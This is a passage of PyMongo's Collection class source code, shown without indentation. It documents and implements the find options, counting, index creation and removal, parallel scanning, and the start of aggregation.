- `cursor_type` (optional): the type of cursor to return. The valid
options are defined by :class:`~pymongo.cursor.CursorType`:
- :attr:`~pymongo.cursor.CursorType.NON_TAILABLE` - the result of
this find call will return a standard cursor over the result set.
- :attr:`~pymongo.cursor.CursorType.TAILABLE` - the result of this
find call will be a tailable cursor - tailable cursors are only
for use with capped collections. They are not closed when the
last data is retrieved but are kept open and the cursor location
marks the final document position. If more data is received
iteration of the cursor will continue from the last document
received. For details, see the `tailable cursor documentation
<http://www.mongodb.org/display/DOCS/Tailable+Cursors>`_.
- :attr:`~pymongo.cursor.CursorType.TAILABLE_AWAIT` - the result
of this find call will be a tailable cursor with the await flag
set. The server will wait for a few seconds after returning the
full result set so that it can capture and return additional data
added during the query.
- :attr:`~pymongo.cursor.CursorType.EXHAUST` - the result of this
find call will be an exhaust cursor. MongoDB will stream batched
results to the client without waiting for the client to request
each batch, reducing latency. See notes on compatibility below.
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for this query. See
:meth:`~pymongo.cursor.Cursor.sort` for details.
- `allow_partial_results` (optional): if True, mongos will return
partial results if some shards are down instead of returning an
error.
- `oplog_replay` (optional): If True, set the oplogReplay query
flag.
- `batch_size` (optional): Limits the number of documents returned in
a single batch.
- `manipulate` (optional): **DEPRECATED** - If True (the default),
apply any outgoing SON manipulators before returning.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `return_key` (optional): If True, return only the index keys in
each document.
- `show_record_id` (optional): If True, adds a field ``$recordId`` in
each document with the storage engine's internal record identifier.
- `snapshot` (optional): **DEPRECATED** - If True, prevents the
cursor from returning a document more than once because of an
intervening write operation.
- `hint` (optional): An index, in the same format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.hint` on the cursor to tell Mongo the
proper index to use for the query.
- `max_time_ms` (optional): Specifies a time limit for a query
operation. If the specified time is exceeded, the operation will be
aborted and :exc:`~pymongo.errors.ExecutionTimeout` is raised. Pass
this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_time_ms` on the cursor.
- `max_scan` (optional): **DEPRECATED** - The maximum number of
documents to scan. Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_scan` on the cursor.
- `min` (optional): A list of field, limit pairs specifying the
inclusive lower bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.min` on the cursor.
- `max` (optional): A list of field, limit pairs specifying the
exclusive upper bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max` on the cursor.
- `comment` (optional): A string or document. Pass this as an
alternative to calling :meth:`~pymongo.cursor.Cursor.comment` on the
cursor.
- `modifiers` (optional): **DEPRECATED** - A dict specifying
additional MongoDB query modifiers. Use the keyword arguments listed
above instead.
.. note:: There are a number of caveats to using
:attr:`~pymongo.cursor.CursorType.EXHAUST` as cursor_type:
- The `limit` option can not be used with an exhaust cursor.
- Exhaust cursors are not supported by mongos and can not be
used with a sharded cluster.
- A :class:`~pymongo.cursor.Cursor` instance created with the
:attr:`~pymongo.cursor.CursorType.EXHAUST` cursor_type requires an
exclusive :class:`~socket.socket` connection to MongoDB. If the
:class:`~pymongo.cursor.Cursor` is discarded without being
completely iterated the underlying :class:`~socket.socket`
connection will be closed and discarded without being returned to
the connection pool.
.. versionchanged:: 3.7
Deprecated the `snapshot` option, which is deprecated in MongoDB
3.6 and removed in MongoDB 4.0.
Deprecated the `max_scan` option. Support for this option is
deprecated in MongoDB 4.0. Use `max_time_ms` instead to limit server
side execution time.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.5
Added the options `return_key`, `show_record_id`, `snapshot`,
`hint`, `max_time_ms`, `max_scan`, `min`, `max`, and `comment`.
Deprecated the option `modifiers`.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.0
Changed the parameter names `spec`, `fields`, `timeout`, and
`partial` to `filter`, `projection`, `no_cursor_timeout`, and
`allow_partial_results` respectively.
Added the `cursor_type`, `oplog_replay`, and `modifiers` options.
Removed the `network_timeout`, `read_preference`, `tag_sets`,
`secondary_acceptable_latency_ms`, `max_scan`, `snapshot`,
`tailable`, `await_data`, `exhaust`, `as_class`, and slave_okay
parameters. Removed `compile_re` option: PyMongo now always
represents BSON regular expressions as :class:`~bson.regex.Regex`
objects. Use :meth:`~bson.regex.Regex.try_compile` to attempt to
convert from a BSON regular expression to a Python regular
expression object. Soft deprecated the `manipulate` option.
.. versionchanged:: 2.7
Added `compile_re` option. If set to False, PyMongo represented BSON
regular expressions as :class:`~bson.regex.Regex` objects instead of
attempting to compile BSON regular expressions as Python native
regular expressions, thus preventing errors for some incompatible
patterns, see `PYTHON-500`_.
.. versionadded:: 2.3
The `tag_sets` and `secondary_acceptable_latency_ms` parameters.
.. _PYTHON-500: https://jira.mongodb.org/browse/PYTHON-500
.. mongodoc:: find
"""
return Cursor(self, *args, **kwargs)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.find_raw_batches()
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: find_raw_batches does not support sessions.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"find_raw_batches does not support sessions")
return RawBatchCursor(self, *args, **kwargs)
def parallel_scan(self, num_cursors, session=None, **kwargs):
"""**DEPRECATED**: Scan this entire collection in parallel.
Returns a list of up to ``num_cursors`` cursors that can be iterated
concurrently. As long as the collection is not modified during
scanning, each document appears once in one of the cursors result
sets.
For example, to process each document in a collection using some
thread-safe ``process_document()`` function:
>>> def process_cursor(cursor):
... for document in cursor:
... # Some thread-safe processing function:
... process_document(document)
>>>
>>> # Get up to 4 cursors.
...
>>> cursors = collection.parallel_scan(4)
>>> threads = [
... threading.Thread(target=process_cursor, args=(cursor,))
... for cursor in cursors]
>>>
>>> for thread in threads:
... thread.start()
>>>
>>> for thread in threads:
... thread.join()
>>>
>>> # All documents have now been processed.
The :meth:`parallel_scan` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `num_cursors`: the number of cursors to return
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs`: additional options for the parallelCollectionScan
command can be passed as keyword arguments.
.. note:: Requires server version **>= 2.5.5**.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added back support for arbitrary keyword arguments. MongoDB 3.4
adds support for maxTimeMS as an option to the
parallelCollectionScan command.
.. versionchanged:: 3.0
Removed support for arbitrary keyword arguments, since
the parallelCollectionScan command has no optional arguments.
"""
warnings.warn("parallel_scan is deprecated. MongoDB 4.2 will remove "
"the parallelCollectionScan command.",
DeprecationWarning, stacklevel=2)
cmd = SON([('parallelCollectionScan', self.__name),
('numCursors', num_cursors)])
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
# We call sock_info.command here directly, instead of
# calling self._command to avoid using an implicit session.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
read_concern=self.read_concern,
parse_write_concern_error=True,
session=session,
client=self.__database.client)
cursors = []
for cursor in result['cursors']:
cursors.append(CommandCursor(
self, cursor['cursor'], sock_info.address,
session=session, explicit_session=session is not None))
return cursors
def _count(self, cmd, collation=None, session=None):
"""Internal count helper."""
with self._socket_for_reads(session) as (sock_info, slave_ok):
res = self._command(
sock_info,
cmd,
slave_ok,
allowable_errors=["ns missing"],
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
if res.get("errmsg", "") == "ns missing":
return 0
return int(res["n"])
def _aggregate_one_result(
self, sock_info, slave_ok, cmd, collation=None, session=None):
"""Internal helper to run an aggregate that returns a single result."""
result = self._command(
sock_info,
cmd,
slave_ok,
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
batch = result['cursor']['firstBatch']
return batch[0] if batch else None
def estimated_document_count(self, **kwargs):
"""Get an estimate of the number of documents in this collection using
collection metadata.
The :meth:`estimated_document_count` method is **not** supported in a
transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
:Parameters:
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
"""
if 'session' in kwargs:
raise ConfigurationError(
'estimated_document_count does not support sessions')
cmd = SON([('count', self.__name)])
cmd.update(kwargs)
return self._count(cmd)
def count_documents(self, filter, session=None, **kwargs):
"""Count the number of documents in this collection.
The :meth:`count_documents` method is supported in a transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count.
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
This option is only supported on MongoDB 3.6 and above.
The :meth:`count_documents` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (required): A query document that selects which documents
to count in the collection. Can be an empty document to count all
documents.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
pipeline = [{'$match': filter}]
if 'skip' in kwargs:
pipeline.append({'$skip': kwargs.pop('skip')})
if 'limit' in kwargs:
pipeline.append({'$limit': kwargs.pop('limit')})
pipeline.append({'$group': {'_id': None, 'n': {'$sum': 1}}})
cmd = SON([('aggregate', self.__name),
('pipeline', pipeline),
('cursor', {})])
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
result = self._aggregate_one_result(
sock_info, slave_ok, cmd, collation, session)
if not result:
return 0
return result['n']
def count(self, filter=None, session=None, **kwargs):
"""**DEPRECATED** - Get the number of documents in this collection.
The :meth:`count` method is deprecated and **not** supported in a
transaction. Please use :meth:`count_documents` or
:meth:`estimated_document_count` instead.
All optional count parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count.
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
The :meth:`count` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (optional): A query document that selects which documents
to count in the collection.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
warnings.warn("count is deprecated. Use estimated_document_count or "
"count_documents instead. Please note that $where must "
"be replaced by $expr, $near must be replaced by "
"$geoWithin with $center, and $nearSphere must be "
"replaced by $geoWithin with $centerSphere",
DeprecationWarning, stacklevel=2)
cmd = SON([("count", self.__name)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
return self._count(cmd, collation, session)
def create_indexes(self, indexes, session=None, **kwargs):
"""Create one or more indexes on this collection.
>>> from pymongo import IndexModel, ASCENDING, DESCENDING
>>> index1 = IndexModel([("hello", DESCENDING),
... ("world", ASCENDING)], name="hello_world")
>>> index2 = IndexModel([("goodbye", DESCENDING)])
>>> db.test.create_indexes([index1, index2])
["hello_world", "goodbye_-1"]
:Parameters:
- `indexes`: A list of :class:`~pymongo.operations.IndexModel`
instances.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: `create_indexes` uses the `createIndexes`_ command
introduced in MongoDB **2.6** and cannot be used with earlier
versions.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. versionadded:: 3.0
.. _createIndexes: https://docs.mongodb.com/manual/reference/command/createIndexes/
"""
common.validate_list('indexes', indexes)
names = []
with self._socket_for_writes() as sock_info:
supports_collations = sock_info.max_wire_version >= 5
def gen_indexes():
for index in indexes:
if not isinstance(index, IndexModel):
raise TypeError(
"%r is not an instance of "
"pymongo.operations.IndexModel" % (index,))
document = index.document
if "collation" in document and not supports_collations:
raise ConfigurationError(
"Must be connected to MongoDB "
"3.4+ to use collations.")
names.append(document["name"])
yield document
cmd = SON([('createIndexes', self.name),
('indexes', list(gen_indexes()))])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
return names
def __create_index(self, keys, index_options, session, **kwargs):
"""Internal create index helper.
:Parameters:
- `keys`: a list of tuples [(key, type), (key, type), ...]
- `index_options`: a dict of index options.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
"""
index_doc = helpers._index_document(keys)
index = {"key": index_doc}
collation = validate_collation_or_none(
index_options.pop('collation', None))
index.update(index_options)
with self._socket_for_writes() as sock_info:
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
else:
index['collation'] = collation
cmd = SON([('createIndexes', self.name), ('indexes', [index])])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
def create_index(self, keys, session=None, **kwargs):
"""Creates an index on this collection.
Takes either a single key or a list of (key, direction) pairs.
The key(s) must be an instance of :class:`basestring`
(:class:`str` in python 3), and the direction(s) must be one of
(:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`,
:data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`,
:data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`,
:data:`~pymongo.TEXT`).
To create a single key ascending index on the key ``'mike'`` we just
use a string argument::
>>> my_collection.create_index("mike")
For a compound index on ``'mike'`` descending and ``'eliot'``
ascending we need to use a list of tuples::
>>> my_collection.create_index([("mike", pymongo.DESCENDING),
... ("eliot", pymongo.ASCENDING)])
All optional index creation parameters should be passed as
keyword arguments to this method. For example::
>>> my_collection.create_index([("mike", pymongo.DESCENDING)],
... background=True)
Valid options include, but are not limited to:
- `name`: custom name to use for this index - if none is
given, a name will be generated.
- `unique`: if ``True`` creates a uniqueness constraint on the index.
- `background`: if ``True`` this index should be created in the
background.
- `sparse`: if ``True``, omit from the index any documents that lack
the indexed field.
- `bucketSize`: for use with geoHaystack indexes.
Number of documents to group together within a certain proximity
to a given longitude and latitude.
- `min`: minimum value for keys in a :data:`~pymongo.GEO2D`
index.
- `max`: maximum value for keys in a :data:`~pymongo.GEO2D`
index.
- `expireAfterSeconds`: <int> Used to create an expiring (TTL)
collection. MongoDB will automatically delete documents from
this collection after <int> seconds. The indexed field must
be a UTC datetime or the data will not expire.
- `partialFilterExpression`: A document that specifies a filter for
a partial index.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
See the MongoDB documentation for a full list of supported options by
server version.
.. warning:: `dropDups` is not supported by MongoDB 3.0 or newer. The
option is silently ignored by the server and unique index builds
using the option will fail if a duplicate value is detected.
.. note:: `partialFilterExpression` requires server version **>= 3.2**
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `keys`: a single key or a list of (key, direction)
pairs specifying the index to create
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): any additional index creation
options (see the above list) should be passed as keyword
arguments
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for passing maxTimeMS
in kwargs.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.2
Added partialFilterExpression to support partial indexes.
.. versionchanged:: 3.0
Renamed `key_or_list` to `keys`. Removed the `cache_for` option.
:meth:`create_index` no longer caches index names. Removed support
for the drop_dups and bucket_size aliases.
.. mongodoc:: indexes
"""
keys = helpers._index_list(keys)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
cmd_options = {}
if "maxTimeMS" in kwargs:
cmd_options["maxTimeMS"] = kwargs.pop("maxTimeMS")
self.__create_index(keys, kwargs, session, **cmd_options)
return name
def ensure_index(self, key_or_list, cache_for=300, **kwargs):
"""**DEPRECATED** - Ensures that an index exists on this collection.
.. versionchanged:: 3.0
**DEPRECATED**
"""
warnings.warn("ensure_index is deprecated. Use create_index instead.",
DeprecationWarning, stacklevel=2)
# The types supported by datetime.timedelta.
if not (isinstance(cache_for, integer_types) or
isinstance(cache_for, float)):
raise TypeError("cache_for must be an integer or float.")
if "drop_dups" in kwargs:
kwargs["dropDups"] = kwargs.pop("drop_dups")
if "bucket_size" in kwargs:
kwargs["bucketSize"] = kwargs.pop("bucket_size")
keys = helpers._index_list(key_or_list)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
# Note that there is a race condition here. One thread could
# check if the index is cached and be preempted before creating
# and caching the index. This means multiple threads attempting
# to create the same index concurrently could send the index
# to the server two or more times. This has no practical impact
# other than wasted round trips.
if not self.__database.client._cached(self.__database.name,
self.__name, name):
self.__create_index(keys, kwargs, session=None)
self.__database.client._cache_index(self.__database.name,
self.__name, name, cache_for)
return name
return None
def drop_indexes(self, session=None, **kwargs):
"""Drops all indexes on this collection.
Can be used on non-existant collections or collections with no indexes.
Raises OperationFailure on an error.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
self.__database.client._purge_index(self.__database.name, self.__name)
self.drop_index("*", session=session, **kwargs)
def drop_index(self, index_or_name, session=None, **kwargs):
"""Drops the specified index on this collection.
Can be used on non-existant collections or collections with no
indexes. Raises OperationFailure on an error (e.g. trying to
drop an index that does not exist). `index_or_name`
can be either an index name (as returned by `create_index`),
or an index specifier (as passed to `create_index`). An index
specifier should be a list of (key, direction) pairs. Raises
TypeError if index is not an instance of (str, unicode, list).
.. warning::
if a custom name was used on index creation (by
passing the `name` parameter to :meth:`create_index` or
:meth:`ensure_index`) the index **must** be dropped by name.
:Parameters:
- `index_or_name`: index (or name of index) to drop
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
name = index_or_name
if isinstance(index_or_name, list):
name = helpers._gen_index_name(index_or_name)
if not isinstance(name, string_type):
raise TypeError("index_or_name must be an index name or list")
self.__database.client._purge_index(
self.__database.name, self.__name, name)
cmd = SON([("dropIndexes", self.__name), ("index", name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
self._command(sock_info,
cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=["ns not found"],
write_concern=self._write_concern_for(session),
session=session)
def reindex(self, session=None, **kwargs):
"""Rebuilds all indexes on this collection.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the reIndex
command (like maxTimeMS) can be passed as keyword arguments.
.. warning:: reindex blocks all other operations (indexes
are built in the foreground) and will be slow for large
collections.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. versionchanged:: 3.5
We no longer apply this collection's write concern to this operation.
MongoDB 3.4 silently ignored the write concern. MongoDB 3.6+ returns
an error if we include the write concern.
"""
cmd = SON([("reIndex", self.__name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
return self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
session=session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection.
>>> for index in db.test.list_indexes():
... print(index)
...
SON([(u'v', 1), (u'key', SON([(u'_id', 1)])),
(u'name', u'_id_'), (u'ns', u'test.test')])
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.command_cursor.CommandCursor`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionadded:: 3.0
"""
codec_options = CodecOptions(SON)
coll = self.with_options(codec_options=codec_options,
read_preference=ReadPreference.PRIMARY)
sock_ctx, read_pref = self._socket_for_primary_reads(session)
with sock_ctx as (sock_info, slave_ok):
cmd = SON([("listIndexes", self.__name), ("cursor", {})])
if sock_info.max_wire_version > 2:
with self.__database.client._tmp_session(session, False) as s:
try:
cursor = self._command(sock_info, cmd, slave_ok,
read_pref,
codec_options,
session=s)["cursor"]
except OperationFailure as exc:
# Ignore NamespaceNotFound errors to match the behavior
# of reading from *.system.indexes.
if exc.code != 26:
raise
cursor = {'id': 0, 'firstBatch': []}
return CommandCursor(coll, cursor, sock_info.address,
session=s,
explicit_session=session is not None)
else:
res = message._first_batch(
sock_info, self.__database.name, "system.indexes",
{"ns": self.__full_name}, 0, slave_ok, codec_options,
read_pref, cmd,
self.database.client._event_listeners)
cursor = res["cursor"]
# Note that a collection can only have 64 indexes, so there
# will never be a getMore call.
return CommandCursor(coll, cursor, sock_info.address)
def index_information(self, session=None):
"""Get information on this collection's indexes.
Returns a dictionary where the keys are index names (as
returned by create_index()) and the values are dictionaries
containing information about each index. The dictionary is
guaranteed to contain at least a single key, ``"key"`` which
is a list of (key, direction) pairs specifying the index (as
passed to create_index()). It will also contain any other
metadata about the indexes, except for the ``"ns"`` and
``"name"`` keys, which are cleaned. Example output might look
like this:
>>> db.test.create_index("x", unique=True)
u'x_1'
>>> db.test.index_information()
{u'_id_': {u'key': [(u'_id', 1)]},
u'x_1': {u'unique': True, u'key': [(u'x', 1)]}}
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
cursor = self.list_indexes(session=session)
info = {}
for index in cursor:
index["key"] = index["key"].items()
index = dict(index)
info[index.pop("name")] = index
return info
def options(self, session=None):
"""Get the options set on this collection.
Returns a dictionary of options and their values - see
:meth:`~pymongo.database.Database.create_collection` for more
information on the possible options. Returns an empty
dictionary if the collection has not been created yet.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
cursor = dbo.list_collections(
session=session, filter={"name": self.__name})
result = None
for doc in cursor:
result = doc
break
if not result:
return {}
options = result.get("options", {})
if "create" in options:
del options["create"]
return options
def _aggregate(self, pipeline, cursor_class, first_batch_size, session,
explicit_session, **kwargs):
common.validate_list('pipeline', pipeline)
if "explain" in kwargs:
raise ConfigurationError("The explain option is not supported. "
"Use Database.command instead.")
collation = validate_collation_or_none(kwargs.pop('collation', None))
max_await_time_ms = kwargs.pop('maxAwaitTimeMS', None)
cmd = SON([("aggregate", self.__name),
("pipeline", pipeline)])
# Remove things that are not command options.
use_cursor = True
if "useCursor" in kwargs:
warnings.warn(
"The useCursor option is deprecated "
"and will be removed in PyMongo 4.0",
DeprecationWarning, stacklevel=2)
use_cursor = common.validate_boolean(
"useCursor", kwargs.pop("useCursor"))
batch_size = common.validate_non_negative_integer_or_none(
"batchSize", kwargs.pop("batchSize", None))
# If the server does not support the "cursor" option we
# ignore useCursor and batchSize.
with self._socket_for_reads(session) as (sock_info, slave_ok):
dollar_out = pipeline and '$out' in pipeline[-1]
if use_cursor:
if "cursor" not in kwargs:
kwargs["cursor"] = {}
# Ignore batchSize when the $out pipeline stage is used.
# batchSize is meaningless in that case since the server
# doesn't return results. This also avoids SERVER-23923.
if first_batch_size is not None and not dollar_out:
kwargs["cursor"]["batchSize"] = first_batch_size
cmd.update(kwargs)
# Apply this Collection's read concern if $out is not in the
# pipeline.
if (sock_info.max_wire_version >= 4
and 'readConcern' not in cmd
and not dollar_out):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and dollar_out:
write_concern = self._write_concern_for(session)
else:
write_concern = None
# Avoid auto-injecting a session: aggregate() passes a session,
# aggregate_raw_batches() passes none.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
parse_write_concern_error=True,
read_concern=read_concern,
write_concern=write_concern,
collation=collation,
session=session,
client=self.__database.client)
if "cursor" in result:
cursor = result["cursor"]
else:
# Pre-MongoDB 2.6 or unacknowledged write. Fake a cursor.
cursor = {
"id": 0,
"firstBatch": result.get("result", []),
"ns": self.full_name,
}
return cursor_class(
self, cursor, sock_info.address,
batch_size=batch_size or 0,
max_await_time_ms=max_await_time_ms,
session=session, explicit_session=explicit_session)
def aggregate(self, pipeline, session=None, **kwargs):
"""Perform an aggregation using the aggregation framework on this
collection.
All optional `aggregate command`_ parameters should be passed as
keyword arguments to this method. Valid options include, but are not
limited to:
- `allowDiskUse` (bool): Enables writing to temporary files. When set
to True, aggregation stages can write data to the _tmp subdirectory
of the --dbpath directory. The default is False.
- `maxTimeMS` (int): The maximum amount of time to allow the operation
to run in milliseconds.
- `batchSize` (int): The maximum number of documents to return per
batch. Ignored if the connected mongod or mongos does not support
returning aggregate results using a cursor, or `useCursor` is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `useCursor` (bool): Deprecated. Will be removed in PyMongo 4.0.
The :meth:`aggregate` method obeys the :attr:`read_preference` of this
:class:`Collection`. Please note that using the ``$out`` pipeline stage
requires a read preference of
:attr:`~pymongo.read_preferences.ReadPreference.PRIMARY` (the default).
The server will raise an error if the ``$out`` pipeline stage is used
with any other read preference.
.. note:: This method does not support the 'explain' option. Please
use :meth:`~pymongo.database.Database.command` instead. An
example is included in the :ref:`aggregate-examples` documentation.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `pipeline`: a list of aggregation pipeline stages
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
:Returns:
